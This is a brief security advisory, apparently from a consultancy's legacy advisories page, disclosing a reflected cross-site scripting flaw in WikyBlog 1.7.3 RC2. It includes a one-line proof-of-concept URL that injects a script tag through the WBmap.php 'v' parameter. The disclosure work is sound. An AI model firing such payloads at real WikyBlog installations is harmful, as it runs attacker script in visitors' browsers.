Home
Consulting
Advisories
Software
Articles
Contact

WikyBlog 1.7.3 RC2 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WikyBlog 1.7.3 RC2 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/WikyBlog-1.7.3rc2/include/WBmap.php?v=%3C/style%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC